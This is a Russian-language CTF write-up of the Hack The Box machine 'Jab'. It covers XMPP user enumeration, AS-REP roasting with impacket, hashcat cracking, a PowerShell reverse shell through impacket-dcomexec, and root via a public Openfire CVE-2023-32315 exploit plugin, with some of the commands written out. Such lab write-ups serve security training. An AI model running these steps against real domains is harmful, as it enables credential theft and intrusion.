Telegram / Boosty / Видео

Подпишись на канал t.me/kiberdruzhinnik, чтобы не пропускать контент.

Смотри на t.me/kiberdruzhinnik/218.

Также на https://boosty.to/kiberdruzhinnik/posts/25008ed3-d91d-425e-859d-5b42e0f5197f я опубликовал подробный видео разбор этой задачи. Это может быть полезно для обучения, если вы делаете первые шаги в информационной безопасности. Поддержать меня на Boosty.

Обзор сервисов

Начнем разведку машины с помощью сканирования портов утилитой rustscan:

Open 10.129.107.62:53
Open 10.129.107.62:88
Open 10.129.107.62:636
Open 10.129.107.62:593
Open 10.129.107.62:464
Open 10.129.107.62:445
Open 10.129.107.62:389
Open 10.129.107.62:139
Open 10.129.107.62:135
Open 10.129.107.62:5985
Open 10.129.107.62:5276
Open 10.129.107.62:5275
Open 10.129.107.62:5270
Open 10.129.107.62:5269
Open 10.129.107.62:5263
Open 10.129.107.62:5262
Open 10.129.107.62:5223
Open 10.129.107.62:5222
Open 10.129.107.62:7777
Open 10.129.107.62:7443
Open 10.129.107.62:7070

Добавим в /etc/hosts домены jab.htb dc01.jab.htb.

XMPP / Jabber

Видим много портов, связанных с XMPP / Jabber. Воспользуемся клиентом Pidgin и зарегистрируем себе пользователя.

Далее попробуем найти список всех пользователей сервера.

alt text

Мы получаем огромный список пользователей домена, которые нам нужно экспортировать в файл usernames.txt.

Теперь с помощью пакета Impacket попробуем на всех этих пользователей выписать TGT, надеясь, что у них стоит флаг Do not require Kerberos preauthentication (процесс долгий, пользователей более 2600):

impacket-GetNPUsers jab.htb/ -usersfile usernames.txt -outputfile outputusers.txt -dc-ip 10.129.107.62 -no-pass

В результате из более 2600 пользователей нам удалось стащить TGT у трех пользователей:

Попробуем их сбрутить.

hashcat -m 18200 -a 0 hash.txt rockyou.txt

В итоге получаем пароль пользователя, с помощью которого снова подключимся к XMPP-серверу.

Обнаруживаем комнату pentest2003 и в ней новые учетные данные.

alt text

С помощью impacket-dcomexec и PowerShell #3 (Base64) из revshells.com получаем шелл:

impacket-dcomexec -silentcommand -object MMC20 jab.htb/svc_openfire:'pwd'@10.129.107.62 "powershell -e ..."

Флаг пользователя

alt text

Повышение привилегий

Проверим сетевые подключения и обнаружим порт 9090:

alt text

Пробросим порт на локальную машину и обнаружим административную панель Openfire. Логинимся с помощью известных учетных данных.

Далее просто получаем шелл с помощью установки плагина из репозитория https://github.com/miko550/CVE-2023-32315.

alt text

Флаг суперпользователя

alt text